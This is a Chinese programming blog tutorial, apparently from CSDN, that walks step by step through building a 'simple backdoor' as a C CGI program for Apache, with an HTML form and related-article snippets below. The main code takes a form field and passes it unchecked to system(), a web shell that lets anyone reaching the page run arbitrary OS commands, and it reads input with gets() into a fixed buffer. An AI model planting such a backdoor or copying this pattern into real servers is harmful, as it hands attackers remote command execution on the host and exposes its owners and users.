一步一步教你使用CGI实现一个简单的后门

最新推荐文章于 2024-07-15 16:51:35 发布
最新推荐文章于 2024-07-15 16:51:35 发布
阅读量6.9k 收藏 2
点赞数 2
分类专栏: 网络编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010105970/article/details/41345967
版权

程序实例1:使用CGI实现文件定向操作

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void main()
{
    //设置HTML语言
    printf("Content-type:text/html\n\n");

    //文件定向操作
    char* str = "ipconfig > 1.txt";

    system(str);
}

将上面的代码编译成的exe文件拷贝到C:\Program Files\Apache Software Foundation\Apache2.2\cgi-bin中,并且将exe从命名为system.cgi

在Apache服务器中执行system.cgi

执行方式请参考:开发基于Apache服务器上的CGI程序

执行成功后会看到C:\Program Files\Apache Software Foundation\Apache2.2\cgi-bin文件中生成了一个1.txt文件

打开1.txt后可以看到1.txt中记录的是本机的ip信息

这就是文件定位操作,将ip信息保存到一个文本中


程序实例2:使用浏览器读取1.txt中的ip信息

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void main()
{
    //设置HTML语言
    printf("Content-type:text/html\n\n");

    //文件定向操作
    char* str = "ipconfig > 1.txt";
    system(str);

    //以读的方式打开1.txt
    FILE* fp = fopen("1.txt", "r");

    //循环成立的条件是没有读到文件结尾
    while(!feof(fp))
    {
        //每次从文件中读取1个字符
        char ch = fgetc(fp);

        if('\n' == ch)
        {
            printf("<br><br>");
        }
        else
        {
            //打印字符
            putchar(ch);
        }
    }
}

将上面的代码编译成的exe文件拷贝到C:\Program Files\Apache Software Foundation\Apache2.2\cgi-bin中,并且将exe从命名为output.cgi

在浏览器上输入:http://localhost/cgi-bin/output.cgi

在浏览器上打印了ip信息


程序实例3:使用CGI实现一个简单的后门

使用记事本编辑下面的HTML代码

<form id="form" name="form" method="post" action="http://localhost/cgi-bin/input.cgi">
<p>
<input type="text" name="BBB" id="input" value="tasklist">
</p>
<p>
<input type="submit" name="AAA" id="submit" value="请进">
</p>
</form>

保存后将文件名修改成houmen.html,最后保存在C:\Program Files\Apache Software Foundation\Apache2.2\htdocs中


使用VS2012编译下面的代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void main()
{
    //设置HTML语言
    printf("Content-type:text/html\n\n");

    //打印环境变量
    printf("%s<br><br>", getenv("QUERY_STRING"));

    char szPost[256] = {0};

    //获取输入
    gets(szPost);

    //打印输入的内容
    printf("%s<br><br>", szPost);
    //BBB=tasklist&AAA=%C7%EB%BD%F8

    char *p = szPost + 4; 
    char*p1 = strchr(szPost, '&');
    *p1 = '\0';

    char cmd[256] = {0};

    //字符串映射
    sprintf(cmd, "%s > 1.txt", p);

    system(cmd);

    //以读的方式打开1.txt
    FILE* fp = fopen("1.txt", "r");

    //循环成立的条件是没有读到文件结尾
    while(!feof(fp))
    {
        //每次从文件中读取1个字符
        char ch = fgetc(fp);

        //当读取到\n时
        if('\n' == ch)
        {
            //打印换行
            printf("<br><br>");
        }
        else
        {
            //打印字符
            putchar(ch);
        }
    }
}

编译成功后,将生成的exe文件重命名为input.cgi,并且拷贝到C:\Program Files\Apache Software Foundation\Apache2.2\cgi-bin中

在浏览器中输入:http://localhost/houmen.html

执行结果:


单击请进后会打印出所有的进程


在输入框中输入ipconfig后单击请进会打印出所有的ip信息


meishadevs
关注
专栏目录
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 297
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1593
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
51.cgi网站后门
weixin_30876945的博客
02-02 110
运行截图: html开发: 1 <html> 2 <body> 3 <form id="form" name="form" method="post" action="../cgi-bin/run.cgi"> 4 <p></p> 5 ...
简单的反弹后门设计和基本模块代码
08-08 2455
 2004-08-24 10:55:41题目:写一个反弹式后门程序,让该程序运行后,就会连接到你指定的计算机,在那台计算机上用NC这样的小工具监听某一端口,当运行这个后门的计算机连接到这个端口后,就能远程执行对方计算机的命令了。要求:任何计算机语言都可以,只要你能写得出来。系统平台:Window版和*nix版分开写看谁写得精彩,随着程序版本的增多,我们会慢慢提出新的功能,看
什么是 CGI 技术
最新发布
孔乙己的博客
07-15 1227
尽管 CGI使用在现代 Web 开发中已经减少,但理解其工作原理和历史背景对于全面掌握 Web 技术的发展是非常有益的。通过上述 Perl 和 Python 的 CGI 程序示例,我们可以看到 CGI 的基本操作方式,以及如何在 Web 服务器上处理动态内容。当今,选择合适的技术方案不仅需要考虑实现的功能,还需要评估性能、安全性、可维护性和开发效率。CGI 作为一种早期的 Web 技术,虽然在某些场景中仍然有效,但在更多情况下,使用更现代化的技术栈将带来更好的开发体验和系统性能。总结来说,
使用C++编写基于WEB CGI后门漏洞
热门推荐
单核CPU的小朋友的博客
12-11 3万+
先上代码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; #include &amp;amp;lt;string&amp;amp;gt; using namespace std; int main() { printf(&amp;quot;Content-Type:text/plain;charset=utf-8\r\n\r\n&a
Python3中有关 CGI编程的小事记录
fmislx007的博客
03-06 93
对于小白的我,真不知道CGI是啥。
嵌入式Web项目(二)——CGI的引入
m0_56145255的博客
04-23 3008
文章目录静态网页工作原理动态网页工作原理CGI的概念CGI工作原理boa配置静态文件与CGI文件访问路径静态文件CGIPath动态网页以shell语言,实现动态网页案例第一次访问测试第二次测试C语言测试 静态网页工作原理 这里以上一节博客中案例test_01.html文件为例。(类比图中的a.html) 浏览器通过访问我的TCP服务器(Web服务器,boa),请求获得test01_html文件的信息。 服务器(boa)在接收到这个请求以后,就会去解析该请求在我们对应的资源目录文件中去寻找请求文件 改资
渗透第一个靶机 shop1.0 (还是简单渗透版)
yangtailang94666的博客
09-27 2073
环境:win7虚拟机 渗透工具 : burpsuite 和菜刀 shop 1.0 通过一些后台字典,简简单单找到了该网站的后台找到。 下一步,进入以管理员身份渗透进入该系统,,使用burpsuit进行暴力破解,或者使用sql注入, 此处使用sql注入来解决。 算了 此处多写一点。 解决一下找后台问题。有些后台会进行隐藏,并不是简单的/admin /logind等 而且网站开发语言也不一样,可能是php也可能是asp 就所以后缀就很复杂,所以就需要使用一些后台扫描工具...
作为一个测试人需要知道的安全测试
qq_44411339的博客
07-06 1461
在所有类型的软件测试中,安全测试可以被认为是最重要的测试之一,其主要目的是在任何软件(Web或基于网络)的应用程序中找到漏洞,并保护其数据免受可额能的攻击或入侵,忧郁许多应用程序包含机密数据,需要被保护,因此需要定期在这样的应用层下上开展健全测试。流动可以被定义为任何系统的弱点(Vulnerability),入侵者或破坏者可以通过该漏洞对系统进行攻击。如果系统没有严格执行安全性测试,那么出现漏洞的机会增加。可以通过打补丁或修复程序来防止系统出现漏洞。WebShell就是以asp、php、jsp或者cgi等网
固件安全评估(一)
m0_65355570的博客
07-15 3324
固件安全测试
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时还是难免疏漏。 我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞到利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
WEB通用网关接口:CGI简单
ARM-Linux
05-12 4056
CGI 全称为Common Gateway Interface (通用网关接口),目的是能够让服务器能够方便的调用外部程序。 CGI本身是一套协议和规范,原则上只要是拥有读写文件功能的编程语言都可以用来编写CGI程序,例如C,C++,Perl,Visual Basic,Shell等等,历史上用来编写CGI程序使用最广泛的是Perl语言,连PHP一开始也是用Perl编写的,估计也受这个传统的...
Web知识点---公共网关接口CGI实现方法
小人物的编程
12-10 1621
介绍了通用网关接口CGI的特点,以及提供了四种编程语言的CGI程序代码
apache的cgi-bin和htdocs配置踩坑,基于apache2.2
weixin_39057744的博客
01-15 1994
DocumentRoot "E:\copy\code\net\htdocs" &lt;Directory "E:\copy\code\net\htdocs"&gt;  ScriptAlias /cgi-bin/ "E:/copy/code/net/cgi-bin/" &lt;Directory "E:/copy/code/net/cgi-bin/"&gt; 在网上找配置的过程中,试了将近两
很有意思的一个自定义CGI,用BAT文件做的。大家发挥想象,自己发挥哈~
a364165628的专栏
04-09 555
httpd.conf: ScriptAlias /bat/ "d:/test/" AddType application/x-httpd-bat .bat Action application/x-httpd-bat "/bat/aaa.bat" aaa.bat: @echo off @echo Content-Type: text/html @echo. @ech
Web渗透测试_目录遍历
分享学习网络的点点滴滴
07-28 411
目录权限限制不严/文件包含/etc/php5/cgi/php.ini(修改这个文件来演示远程文件包含漏洞)应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件读、写文件、远程执行代码特征(不决定)?page=a.php??...
使用Python编写的CGI脚本
例如,一个简单CGI脚本可能会读取GET或POST参数,进行计算,然后返回一个HTML响应。 以下是一个基本的Python CGI脚本示例: ```python #!/usr/bin/env python import cgi print("Content-Type: text/html") # ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值